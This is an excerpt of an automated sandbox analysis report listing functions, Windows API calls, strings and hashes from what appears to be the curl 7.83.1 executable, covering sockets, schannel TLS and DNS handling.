setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000,001174AB,?,00000000,?,?,?,000C901E,?), ref: 000CCE59
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00120780,00000002), ref: 000CCE75
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000CCEC0

Strings

z, xrefs: 000CCE96
--disable, xrefs: 000CCE82

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfreesetlocalestrncmp
String ID: --disable$z
API String ID: 792593065-3267513583
Opcode ID: c550094d53491ff43de1540826fec1e26acb3abb7f8756e277f83fd50786689e
Instruction ID: bc13901735e5b014768e3999b7a2ac4b96b1f03b868487248df91269be2451af
Opcode Fuzzy Hash: c550094d53491ff43de1540826fec1e26acb3abb7f8756e277f83fd50786689e
Instruction Fuzzy Hash: 4E21DA31700611DBEBB4A754D996FFD22D19B46760F24443EF90AD6592DF70DC819281

Function 000DE574 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,?), ref: 000DE5C6
WSAGetLastError.WS2_32(?,?,?), ref: 000DE5D0

Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 000DE60E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 000DE616

Strings

getsockname() failed with errno %d: %s, xrefs: 000DE5E9
ssloc inet_ntop() failed with errno %d: %s, xrefs: 000DE630

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetsocknamestrncpy
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2515041809-2605427207
Opcode ID: 707a92cea73b36ebb6f114c462971ff508dc0421afa951d71061b3af57fd86e9
Instruction ID: 273cc01f76c733e3ec3254b392a04d269ec029b0267a3456a6dab15e91b98d3b
Opcode Fuzzy Hash: 707a92cea73b36ebb6f114c462971ff508dc0421afa951d71061b3af57fd86e9
Instruction Fuzzy Hash: 26214272900218ABDB24AB64DC45ADE77B9EB49350F4081A6F509D7241EF709E858FB1

Function 000C8F92 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

_mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,--dump-module-paths), ref: 000C8F9A
QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(0012FAF8), ref: 000C8FF7
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C902C

Part of subcall function 000C310D: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 000C3148
Part of subcall function 000C310D: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C3155
Part of subcall function 000C310D: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C316F

Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101

Strings

%s, xrefs: 000C8FB5
--dump-module-paths, xrefs: 000C8F92
YR{, xrefs: 000C8FE0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CloseCreateErrorFrequencyHandleLastPerformanceQuerySnapshotToolhelp32__acrt_iob_func_mbscmpfflush
String ID: %s$--dump-module-paths$YR{
API String ID: 3670006343-1349242960
Opcode ID: 5cfb4c2905e49702ef6b45a76303b17d3554429073f6568c5402e390389b2228
Instruction ID: 1958936361e5cc7441960af98d6b419ae11b57af51cf65ab69eaa705e5423f0b
Opcode Fuzzy Hash: 5cfb4c2905e49702ef6b45a76303b17d3554429073f6568c5402e390389b2228
Instruction Fuzzy Hash: B60108335587129BC7296764EC06FAE3791DF847A0F15862EF808572D2EF719C428751

Function 000DD282 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,A0F2C5C3), ref: 000DD2A5
WSACleanup.WS2_32 ref: 000DD31F

Part of subcall function 000F4E72: GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,000DD2C2), ref: 000F4EB0

Part of subcall function 000DD33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD34B
Part of subcall function 000DD33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD363
Part of subcall function 000DD33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00117348,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD374
Part of subcall function 000DD33A: LoadLibraryExA.KERNELBASE(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3B6

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,if_nametoindex), ref: 000DD2DF
QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(0012FAE8), ref: 000DD315

Strings

iphlpapi.dll, xrefs: 000DD2C6
if_nametoindex, xrefs: 000DD2D9

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3026270583-3097795196
Opcode ID: d492dfae92bc5a60a6fe12c0c381c559036746315a305dff72acf23a84603a61
Instruction ID: 5f90facbbb8be2a464bcdba01b9ac8999da2583176d39a7042c46828df67a3c5
Opcode Fuzzy Hash: d492dfae92bc5a60a6fe12c0c381c559036746315a305dff72acf23a84603a61
Instruction Fuzzy Hash: A8114870B00300ABD734AF74BD0BBAA33E9DF88700F40013FE949C6691FB2089928762

Function 000EF35E Relevance: 9.3, APIs: 6, Instructions: 269networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00002726,00000000,00000000,00000000), ref: 000EF506
__aulldvrm.LIBCMT ref: 000EF55C
select.WS2_32(00000100,?,?,?,?), ref: 000EF5E9
__WSAFDIsSet.WS2_32(000000FF,?), ref: 000EF623
__WSAFDIsSet.WS2_32(000000FF,?), ref: 000EF65B
__WSAFDIsSet.WS2_32(000000FF,?), ref: 000EF679

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast__aulldvrmselect
String ID:
API String ID: 1566158641-0
Opcode ID: 7c7eaca55c8a4fed181c9ffe1ef7a0db5781530610c1a95f5f7def2881df9362
Instruction ID: df3ee9f3c7a42186e8c8160ae6a9a92dc1910ba2dce555e2e5c5bce63bf632e3
Opcode Fuzzy Hash: 7c7eaca55c8a4fed181c9ffe1ef7a0db5781530610c1a95f5f7def2881df9362
Instruction Fuzzy Hash: 32A19471A0065A8FDB798F2AC8846BAB7F9FF58310F1045BEE559E6190E7709E818F40

Function 000E4E84 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4EE0

Strings

Could not resolve host: %s, xrefs: 000E504D
Unix socket path too long: '%s', xrefs: 000E4F20
Couldn't resolve proxy '%s', xrefs: 000E50E9
Failed to resolve host '%s' with timeout after %ld ms, xrefs: 000E5016

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: calloc
String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %ld ms$Unix socket path too long: '%s'
API String ID: 2635317215-2215122109
Opcode ID: e0e5cc5f3e19123571c966ff7581c9915e7f40bbb5902d16b7cd34a3bf818344
Instruction ID: 9f9322272b06cb3aa50e638bd0d33fa590b24720df031f222de12d74e5485f6e
Opcode Fuzzy Hash: e0e5cc5f3e19123571c966ff7581c9915e7f40bbb5902d16b7cd34a3bf818344
Instruction Fuzzy Hash: C371F431E04699AFEF219F65CC45BAE7BB2AF44710F1444B6FD44BF292D6B19C008BA1

Function 001060A0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001062F0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010632C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00106356

Strings

schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 001062AE
schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 00106118
schannel: ApplyControlToken failure: %s, xrefs: 001061B9

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
API String ID: 1294909896-1242988243
Opcode ID: 4bec1765f87c529166e378f1a23a39c6c70e3d9fa8f5f5ae812cd021fc7456b2
Instruction ID: 76376e9a38ddf5edc8958643fc14984fb746f4ba99aa6e2e87fbe79f2b8d5c4e
Opcode Fuzzy Hash: 4bec1765f87c529166e378f1a23a39c6c70e3d9fa8f5f5ae812cd021fc7456b2
Instruction Fuzzy Hash: 9581A370900229DFCB25DF14DD44BD9B7B5FF48310F0081AAE889A7691D7B4AEA5CF90

Function 000E8B9F Relevance: 9.1, APIs: 6, Instructions: 96COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?), ref: 000E8BBF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?,?), ref: 000E8C96

Part of subcall function 000E88E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8C01,?,?,00000000), ref: 000E8928
Part of subcall function 000E88E1: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,000E8C01,?,?,00000000), ref: 000E8936

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?,?,?,?), ref: 000E8C19
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?,?,?,?), ref: 000E8C2E
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,000E8A20,00000010,00000000,00000000,?,?,?,?,?,?,?,?,?,000EEBB8), ref: 000E8C63

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$CriticalInitializeSection_beginthreadex_errnocallocmalloc
String ID:
API String ID: 1055258384-0
Opcode ID: aa4a75a237811f762d3edd291a267fa9b615a96f9b747f1c3aef38929c82ebc2
Instruction ID: 2e718edac3a550cf56e80bfc9a78be1dc68f929c04d07c2e1f6b200584fe8314
Opcode Fuzzy Hash: aa4a75a237811f762d3edd291a267fa9b615a96f9b747f1c3aef38929c82ebc2
Instruction Fuzzy Hash: 4C31A371A01615EFDB288F65EC4459E7BF5FF89310B20806EE80AE7291DB70A941CB95

Function 001057F0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207networkCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010589A
WSAGetLastError.WS2_32 ref: 00105A16
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00105A73

Strings

select/poll on SSL socket, errno: %d, xrefs: 00105A1D
schannel: timed out sending data (bytes sent: %zd), xrefs: 00105A34

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastfreemalloc
String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
API String ID: 1010545285-3891197721
Opcode ID: 8baf36e0a96fc980fc3c2216ddb4d67809b28802bab99f8ab7f018df9ffa63a3
Instruction ID: a330e5c2e989b3d0b501e69e8f36b41b88cd0e1797c014a5b75979e5c21cf49e
Opcode Fuzzy Hash: 8baf36e0a96fc980fc3c2216ddb4d67809b28802bab99f8ab7f018df9ffa63a3
Instruction Fuzzy Hash: 5B810671A08701DFC714CF19D884A5ABBE6BF88724F148A2EF89997391D770D941CF92

Function 000C36BA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000C3737
_close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C3742

Strings

%s\%s, xrefs: 000C36FC
%s\%c%s, xrefs: 000C36EB
._, xrefs: 000C36D1

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _close_strdup
String ID: %s\%c%s$%s\%s$._
API String ID: 2375632809-4149339551
Opcode ID: af7ce43fc8c073772d759e5a543f30b342f2da8764b45e5b64ad13e8bb3d3fcf
Instruction ID: 2d0f03271e226c6fe896ead7b1516020f6c4c225bedead18a3465c481b2da7e9
Opcode Fuzzy Hash: af7ce43fc8c073772d759e5a543f30b342f2da8764b45e5b64ad13e8bb3d3fcf
Instruction Fuzzy Hash: D41136A79182096AAB196BE89C42EFEB778DF55710B10816EF84096342E6609A4147B1

Function 000DDCB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 000DDCE2
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 000DDD3E
WSAGetLastError.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000,?,0000FFFF,00000008,?,00000004), ref: 000DDD48

Strings

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 000DDD50
Failed to set SO_KEEPALIVE on fd %d, xrefs: 000DDCED

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorIoctlLastsetsockopt
String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
API String ID: 1819429192-3022933585
Opcode ID: e6f8a622be06d9883b03617c4302aae51a5aa9f0c0e3ccad4f6e8af759110116
Instruction ID: 7fdbf0eb8250a6830c6e9d9f03c2698f6d959ea966c0b66ff65c8e2dcf63cc8a
Opcode Fuzzy Hash: e6f8a622be06d9883b03617c4302aae51a5aa9f0c0e3ccad4f6e8af759110116
Instruction Fuzzy Hash: 26116DB1A00205AFE714DF64DC46EFF76BDEB46710F00426FB515E6180EB649A408BA5

Function 000D6F2D Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D6F9B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D6FB9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D70AA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7229

Strings

Connection #%ld to host %s left intact, xrefs: 000D7182

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Connection #%ld to host %s left intact
API String ID: 1294909896-3505918467
Opcode ID: d8fcd09df65db17f0650178bfb1309229a4e788f2c22fe6c11ef7ae8b32381b1
Instruction ID: 12ce15773bc39525b3194bafb2f6ff260af89937471873e81630e5db76d1d680
Opcode Fuzzy Hash: d8fcd09df65db17f0650178bfb1309229a4e788f2c22fe6c11ef7ae8b32381b1
Instruction Fuzzy Hash: 4681D430A04715DBDB2A9F24C8897EDB7E1BF44710F1841ABE84C5B392EB746D81CBA1

Function 000C31FA Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,000C9002), ref: 000C31FC
GetConsoleMode.KERNELBASE(00000000,0012F568), ref: 000C3212
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000001,?), ref: 000C3239
SetConsoleMode.KERNELBASE(00000003), ref: 000C3252
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000000), ref: 000C326C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Console$CtrlHandlerMode$Handle
String ID:
API String ID: 575565773-0
Opcode ID: 6c1075f0480bbb6e978eb7efa2462f166c1688c5cc45e4435c02e3d948817798
Instruction ID: cb20daf98baa5857b38dcdbbff8f4ab14f04f8282f899d488a36885c1681ff76
Opcode Fuzzy Hash: 6c1075f0480bbb6e978eb7efa2462f166c1688c5cc45e4435c02e3d948817798
Instruction Fuzzy Hash: A5016D70654711BEEB229F34FE09FA936A4AF46762F24823CF961D54E0D7208A938A50

Function 000EEA06 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 000EEAE7
inet_pton.WS2_32(00000017,?,?), ref: 000EEB16

Strings

localhost, xrefs: 000EEB5B
Hostname %s was found in DNS cache, xrefs: 000EEA68

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: inet_pton
String ID: Hostname %s was found in DNS cache$localhost
API String ID: 1350483568-3522642687
Opcode ID: 681e0c948eb427f5b475ad641440c7f93553d87eb282a1491f598e8045f838cf
Instruction ID: ab4ec25b7c5e24ee067b2aae9e9c68afb6b18a625b257520740fed8f51b2fb74
Opcode Fuzzy Hash: 681e0c948eb427f5b475ad641440c7f93553d87eb282a1491f598e8045f838cf
Instruction Fuzzy Hash: D361E431B0029D9FDF259F66D885AFEBBE6BF88320F14402AE405B7291DB709C41DB90

Function 000C1E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A,?,?,?,?), ref: 000C1E56
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F4,?,?,?), ref: 000C1E9D
GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?), ref: 000C1EAD

Strings

COLUMNS, xrefs: 000C1E3F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: BufferConsoleHandleInfoScreenstrtol
String ID: COLUMNS
API String ID: 283564500-2475376301
Opcode ID: fd7f90bdded969573a21a7bd2cd9b81cbbb3fda82b7ca1dff48a7881f1506e3e
Instruction ID: e51626acc573afcad23ae552619229f85b580c4f3c9e64101eee2b5e48d839cf
Opcode Fuzzy Hash: fd7f90bdded969573a21a7bd2cd9b81cbbb3fda82b7ca1dff48a7881f1506e3e
Instruction Fuzzy Hash: 6031BA709006049BDB24DF68C884BEEB7F4AF4A314F20066EE846D6692E735E985CB90

Function 000F4E72 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
Part of subcall function 000D0B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74

Part of subcall function 000DD33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD34B
